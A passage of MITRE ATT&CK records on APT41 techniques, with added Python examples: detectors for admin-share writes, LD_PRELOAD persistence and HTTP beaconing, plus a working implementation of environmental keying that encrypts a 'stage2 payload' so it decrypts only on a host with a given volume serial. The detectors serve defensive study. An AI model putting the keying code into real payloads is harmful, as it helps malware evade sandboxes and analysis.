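written on the target host when "Audit Detailed File Share" is enabled; the field
names below follow that event. The records are constructed sample data.
"""
import re
from collections import defaultdict

# Administrative shares: ADMIN$ and the per-drive <letter>$ shares. IPC$ is deliberately
# excluded: every named-pipe RPC call (svcctl, samr, ...) goes through it, so it is noise.
ADMIN_SHARE = re.compile(r"^\\\\\*\\(ADMIN\$|[A-Za-z]\$)$", re.IGNORECASE)
# Access-mask bits that indicate a write: FILE_WRITE_DATA, FILE_APPEND_DATA, DELETE.
WRITE_BITS = 0x2 | 0x4 | 0x10000
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs")

EVENTS = [  # constructed 5145 records, one dict per event
    {"host": "FS01", "src_ip": "10.0.5.23", "user": "svc_backup",
     "share": r"\\*\ADMIN$", "target": r"Temp\patch.exe", "mask": 0x12019F},
    {"host": "FS01", "src_ip": "10.0.5.23", "user": "svc_backup",
     "share": r"\\*\IPC$", "target": "svcctl", "mask": 0x12019F},
    {"host": "WS17", "src_ip": "10.0.5.23", "user": "svc_backup",
     "share": r"\\*\C$", "target": r"Windows\Temp\svc.dll", "mask": 0x12019F},
    {"host": "FS01", "src_ip": "10.0.9.8", "user": "alice",
     "share": r"\\*\Finance", "target": r"Q3\report.xlsx", "mask": 0x100081},
    {"host": "DC01", "src_ip": "10.0.1.1", "user": "jumpadmin",
     "share": r"\\*\C$", "target": r"Windows\Logs\x.log", "mask": 0x100081},
]


def is_admin_share(share: str) -> bool:
    return ADMIN_SHARE.match(share) is not None


def find_admin_share_writes(events, allowed_sources=()):
    """Events in which a client wrote a payload-like file into an admin share."""
    return [e for e in events
            if e["src_ip"] not in allowed_sources
            and is_admin_share(e["share"])
            and e["mask"] & WRITE_BITS
            and e["target"].lower().endswith(PAYLOAD_EXT)]


def lateral_spread(events, allowed_sources=()):
    """Hosts whose admin shares each non-allow-listed source touched. One source reaching
    several hosts in a short window is the lateral-movement pattern, even without writes."""
    spread = defaultdict(set)
    for e in events:
        if e["src_ip"] not in allowed_sources and is_admin_share(e["share"]):
            spread[e["src_ip"]].add(e["host"])
    return {ip: sorted(hosts) for ip, hosts in spread.items()}


if __name__ == "__main__":
    jump_hosts = {"10.0.1.1"}  # assumed allow-list of administrative jump hosts
    for hit in find_admin_share_writes(EVENTS, allowed_sources=jump_hosts):
        print(f'{hit["src_ip"]} ({hit["user"]}) wrote {hit["target"]} to {hit["share"]} on {hit["host"]}')
    print(lateral_spread(EVENTS, allowed_sources=jump_hosts))
```

The write check keys on the access mask rather than on the share name alone, because read-only enumeration of `C$` by backup and inventory tools is common; the spread check is kept separate so that a source touching many hosts still surfaces when it only stages files with benign-looking names.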
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--7f9fe6d5-79ba-44ca-bf19-c980e5c2fc11
revoked : False
technique : Dynamic Linker Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher-level syntax such as Python's <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle)(Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) The two mechanisms differ in reach: for set-user-ID and set-group-ID programs the dynamic linker runs in secure-execution mode, where it ignores <code>LD_PRELOAD</code> entries that contain a slash and preloads only set-user-ID libraries from the standard search directories, whereas <code>/etc/ld.so.preload</code>, which only root can write, applies to every dynamically linked program, including privileged ones.

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic linker (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.006
matrix : mitre-attack
platform : ['Linux', 'macOS']
data_sources : ['File: File Creation', 'Command: Command Execution', 'Module: Module Load', 'Process: Process Creation', 'File: File Modification']
permissions_required : ['User']
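The two Linux entry points described above, the `/etc/ld.so.preload` file and the `LD_PRELOAD` variable in a process environment, are both plain text and can be audited from a host or a forensic image. The following is an added example (not ATT&CK's content and not APT41's code) that parses both formats as `ld.so` reads them and reports every preloaded library, marking anything outside the standard library directories as suspicious. The preload file text, the process list and the `TRUSTED_DIRS` prefixes are assumptions; on a live host the same data comes from `/etc/ld.so.preload` and `/proc/<pid>/environ`.

```python
"""Audit LD_PRELOAD-style persistence on a Linux host: entries in /etc/ld.so.preload and
LD_PRELOAD in each process environment (the /proc/<pid>/environ format).

Added example; not part of ATT&CK or of any APT41 report. The preload file text and the
process environments are constructed; on a live host read /etc/ld.so.preload and
/proc/<pid>/environ instead (root is needed for other users' processes).
"""
import posixpath

# Absolute paths under these prefixes are treated as baseline; anything else (relative
# names, /tmp, /dev/shm, home directories, path traversal) is reported as suspicious.
TRUSTED_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def parse_preload_file(text: str) -> list:
    """ld.so.preload is a whitespace-separated list of shared objects; '#' starts a comment."""
    libs = []
    for line in text.splitlines():
        libs.extend(line.split("#", 1)[0].split())
    return libs


def parse_environ(blob: bytes) -> dict:
    """/proc/<pid>/environ is a NUL-separated sequence of KEY=VALUE entries."""
    env = {}
    for item in blob.split(b"\0"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def is_suspicious(lib: str) -> bool:
    # normpath first so "/usr/lib/../../tmp/x.so" is not mistaken for a trusted path
    return not posixpath.normpath(lib).startswith(TRUSTED_DIRS)


def audit(preload_text: str, processes) -> list:
    """One finding per preloaded library, from the file and from live processes.
    `processes` is an iterable of (pid, comm, environ_bytes)."""
    findings = []
    for lib in parse_preload_file(preload_text):
        findings.append({"source": "/etc/ld.so.preload", "library": lib,
                         "suspicious": is_suspicious(lib)})
    for pid, comm, environ in processes:
        value = parse_environ(environ).get("LD_PRELOAD")
        if value:
            for lib in value.replace(":", " ").split():  # ld.so accepts ':' or space separators
                findings.append({"source": f"pid {pid} ({comm})", "library": lib,
                                 "suspicious": is_suspicious(lib)})
    return findings


# Constructed sample data: one root-level persistence entry in the preload file, one
# injected process, and a developer process using a sanitizer library legitimately.
PRELOAD_FILE = ("# managed by config tool\n"
                "/usr/lib/x86_64-linux-gnu/libexample-agent.so\n"
                "/dev/shm/.cache/libsys.so\n")
PROCESSES = [
    (1201, "sshd", b"PATH=/usr/bin\0LANG=C\0"),
    (2210, "nginx", b"PATH=/usr/sbin\0LD_PRELOAD=/tmp/.x/libprocesshider.so\0"),
    (2311, "python3", b"LD_PRELOAD=/usr/lib/libasan.so.6:/home/dev/hook.so\0"),
]

if __name__ == "__main__":
    for f in audit(PRELOAD_FILE, PROCESSES):
        flag = "SUSPICIOUS" if f["suspicious"] else "baseline  "
        print(f'{flag} {f["source"]} -> {f["library"]}')
```

A trusted-directory entry still deserves a look (the file has to be justified by something on the host), but the prefix check is what separates a dropped `/dev/shm` or `/tmp` library from a packaging or debugging use; the preload file is the higher-value finding because, as noted above, it reaches privileged programs that ignore the environment variable.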
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second-stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)
relationship_id : relationship--5212a108-111b-4467-84c9-933d2b84aad2
revoked : False
technique : Environmental Keying
technique_description : Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload, the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper)

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1480.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
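The relationship above says APT41 keyed a second stage to the volume serial number; the mechanism the technique text describes is worth seeing end to end, because it explains what an analyst needs from the victim host to recover such a payload. The following is an added example and not APT41's implementation: the cited reporting describes RC5 with a key derived in part from the serial, while this uses SHA-256 in counter mode with an HMAC tag (standard library only) so it runs anywhere. `CAMPAIGN_SALT`, the serial values and the payload bytes are constructed; `windows_volume_serial` shows how the live value is read on Windows and is not called by the demo.

```python
"""Environmental keying: encrypt a second-stage payload under a key derived from a value
that only the intended host has (here the 32-bit volume serial number), so a sandbox or
analyst VM with a different serial cannot decrypt it.

Added example; not APT41's code (they used RC5; this is SHA-256/CTR + HMAC from the
standard library). CAMPAIGN_SALT and all serial values are assumptions.
"""
import hashlib
import hmac
import os
import struct

CAMPAIGN_SALT = bytes.fromhex("7f1d4a0c9b3e5d2a8c6f0e1b2d3c4a5f")  # assumed, 16 bytes


def derive_key(volume_serial: int, salt: bytes) -> bytes:
    """Key = SHA-256(salt || serial). The salt ships with the stager, the serial is read on
    the target, so the key itself never appears in the file or on the network."""
    return hashlib.sha256(salt + struct.pack("<I", volume_serial)).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    blocks, counter = [], 0
    while len(blocks) * 32 < length:
        blocks.append(hashlib.sha256(key + nonce + struct.pack("<Q", counter)).digest())
        counter += 1
    return b"".join(blocks)[:length]


def seal(payload: bytes, volume_serial: int, salt: bytes = CAMPAIGN_SALT) -> bytes:
    """Operator side: blob = salt || nonce || ciphertext || HMAC-SHA256 tag."""
    assert len(salt) == 16
    key = derive_key(volume_serial, salt)
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return salt + nonce + ct + tag


def open_on_host(blob: bytes, volume_serial: int):
    """Target side: the payload, or None when the environment does not match (the
    guardrail trips and nothing is executed, rather than running garbage)."""
    salt, nonce, ct, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    key = derive_key(volume_serial, salt)
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


def recover_serial(blob: bytes, candidates):
    """Analyst side: the tag lets each candidate serial be verified offline. A bare 32-bit
    serial is only a 2**32 search, which is feasible; that is why real implementations
    derive the key from the serial *in part*, mixed with further host-specific values."""
    for serial in candidates:
        if open_on_host(blob, serial) is not None:
            return serial
    return None


def windows_volume_serial(root: str = "C:\\") -> int:
    """Read the live serial on Windows via GetVolumeInformationW (not used by the demo)."""
    import ctypes
    serial = ctypes.c_uint32()
    ok = ctypes.windll.kernel32.GetVolumeInformationW(
        root, None, 0, ctypes.byref(serial), None, None, None, 0)
    if not ok:
        raise ctypes.WinError()
    return serial.value


if __name__ == "__main__":
    blob = seal(b"stage2 payload bytes", 0x1A2B3C4D)
    print(open_on_host(blob, 0x1A2B3C4D))  # decrypts on the keyed host
    print(open_on_host(blob, 0x1A2B3C4E))  # None anywhere else
```

For incident response this is the practical consequence of the technique: a memory capture or disk image of the actual victim, including its volume serial (visible in `vol` output or the boot sector), is what makes the staged payload recoverable, and the HMAC-style check means a sample run in a sandbox simply refuses rather than crashing.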
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150
revoked : False
technique : Web Protocols
technique_description : Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
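When the request content blends in as the technique text describes, the "Network Traffic Flow" data source is what is left: an implant that polls its server on a timer shows up as a client contacting one host at nearly constant intervals, which ordinary browsing does not. The following is an added example (not ATT&CK's content and not from any APT41 report) that reads constructed web-proxy log lines and reports client/host pairs whose inter-request gaps have a low coefficient of variation. The log format (ISO timestamp, client IP, method, URL, status, bytes), the `min_connections` and `max_cv` thresholds and every log line are assumptions.

```python
"""Find HTTP beaconing in web-proxy logs: a client that contacts the same host at nearly
fixed intervals, which is how a C2 implant hiding in web traffic looks from the flow side
even when the request content is unremarkable.

Added example; not part of ATT&CK or of any APT41 report. The log format and all log
lines are constructed.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
                  r"(?P<status>\d{3}) (?P<bytes>\d+)$")


def parse(lines):
    """Yield (timestamp, client, host) for each well-formed line; skip the rest."""
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        yield ts, m["src"], m["url"].split("/")[2]


def find_beacons(lines, min_connections=6, max_cv=0.15):
    """{(client, host): stats} for pairs whose inter-request gaps are nearly constant.
    cv = population std-dev / mean of the gaps; human browsing is bursty (cv well above 1),
    a timer with a few seconds of jitter sits far below 0.15."""
    by_pair = defaultdict(list)
    for ts, src, host in parse(lines):
        by_pair[(src, host)].append(ts)
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons[pair] = {"connections": len(times), "period_s": round(mean, 1),
                             "cv": round(cv, 3)}
    return beacons


LOG = [  # constructed: one implant polling about every 60 s, one person reading news
    "2020-03-01T10:00:00Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:00:05Z 10.0.9.8 GET http://news.example/ 200 48211",
    "2020-03-01T10:00:07Z 10.0.9.8 GET http://news.example/style.css 200 9031",
    "2020-03-01T10:00:40Z 10.0.9.8 GET http://news.example/story/17 200 30555",
    "2020-03-01T10:01:02Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:01:59Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:03:01Z 10.0.5.23 POST http://cdn-update.example/api/v1/check 200 640",
    "2020-03-01T10:03:10Z 10.0.9.8 GET http://news.example/story/18 200 29870",
    "2020-03-01T10:03:12Z 10.0.9.8 GET http://news.example/img/18.jpg 200 150221",
    "2020-03-01T10:04:00Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:04:58Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:06:01Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:07:00Z 10.0.5.23 GET http://cdn-update.example/api/v1/check 200 512",
    "2020-03-01T10:09:30Z 10.0.9.8 GET http://news.example/story/19 200 31002",
]

if __name__ == "__main__":
    for (src, host), stats in find_beacons(LOG).items():
        print(f"{src} -> {host}: {stats}")
```

Software update checks and monitoring agents also poll on timers, so in practice the output is joined against a list of known polling destinations before it becomes an alert; the jitter tolerance (`max_cv`) is the knob to widen when an implant randomizes its sleep.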
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
